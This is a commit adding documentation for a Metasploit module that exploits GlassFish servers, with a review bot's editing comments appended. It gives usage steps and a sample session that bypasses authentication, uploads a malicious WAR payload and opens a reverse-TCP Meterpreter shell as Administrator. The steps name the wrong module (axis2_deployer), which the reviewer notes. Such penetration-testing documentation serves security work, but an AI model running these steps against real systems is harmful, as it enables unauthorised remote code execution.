Documentation on glassfish_deployer

bug/bundler_fix
itsmeroy2012 2017-03-27 19:23:39 +05:30
parent 91c7a1bc34
commit 8ad61a11c8
1 changed files with 51 additions and 0 deletions

@ -0,0 +1,51 @@
##Description
This module logs in to an GlassFish Server (Open Source or Commercial) using various methods (such as authentication bypass, default credentials, or user-supplied login), and deploys a malicious war file in order to get remote code execution. It has been tested on Glassfish 2.x, 3.0, 4.0 and Sun Java System Application Server 9.x. Newer GlassFish versions do not allow remote access (Secure Admin) by default, but is required for exploitation.
## GlassFish
GlassFish is an open-source application server project started by Sun Microsystems for the Java EE platform and now sponsored by Oracle Corporation. The supported version is called Oracle GlassFish Server. GlassFish is free software, dual-licensed under two free software licences: the Common Development and Distribution License (CDDL) and the GNU General Public License (GPL) with the classpath exception.
## Verification Steps
1. Do: ```use exploit/multi/http/axis2_deployer```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set USERNAME [Username]```
4. Do: ```set PASSWORD [Password]```
5. Do: ```run```
##Sample Output
```
msf > use exploit/multi/http/glassfish_deployer
msf exploit(glassfish_deployer) > set RHOST 172.16.182.237
RHOST => 172.16.182.237
msf exploit(glassfish_deployer) > set USERNAME admin
USERNAME => admin
msf exploit(glassfish_deployer) > set PASSWORD admin123
PASSWORD => admin123
msf exploit(glassfish_deployer) > exploit
[*] Started reverse TCP handler on 172.16.182.112:4444
[*] Glassfish edition: GlassFish Server Open Source Edition 3.0.1
[*] Trying GlassFish authentication bypass..
[+] http://172.16.182.237:4848// - GlassFish - SUCCESSFUL authentication bypass
[*] Uploading payload...
[*] Successfully uploaded
[*] Executing /icDfejbl6Vc9ZobfgVv9LIBES/SV7fVtWuTQFZqtzMPiJ.jsp...
[*] Sending stage (30355 bytes) to 172.16.182.237
[*] Meterpreter session 1 opened (172.16.182.112:4444 -> 172.16.182.237:1472) at 2017-03-27 19:07:58 -0500
[*] Getting information to undeploy...
[*] Undeploying icDfejbl6Vc9ZobfgVv9LIBES...
[*] Undeployment complete.
meterpreter > getuid
Server username: Administrator
meterpreter > sysinfo
Computer : juan-6ed9db6ca8
OS : Windows 2003 5.2 (x86)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...
```
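
Review bot: step 1 of Verification Steps loads `exploit/multi/http/axis2_deployer`, but this file documents glassfish_deployer and the Sample Output uses `use exploit/multi/http/glassfish_deployer`; the step should name that module. Step 2 sets `RHOSTS` while the sample session sets `RHOST`, so pick the option name the module actually takes and use it in both places. The steps also end at `run` without saying what result confirms success, which the sample output suggests is a session opening followed by the undeploy messages. In the Description, the closing clause "but is required for exploitation" has no subject; state that remote access (Secure Admin) must be enabled for the module to work, and change "an GlassFish" to "a GlassFish". The `##Description` and `##Sample Output` headings lack the space after `##` that `## GlassFish` and `## Verification Steps` have.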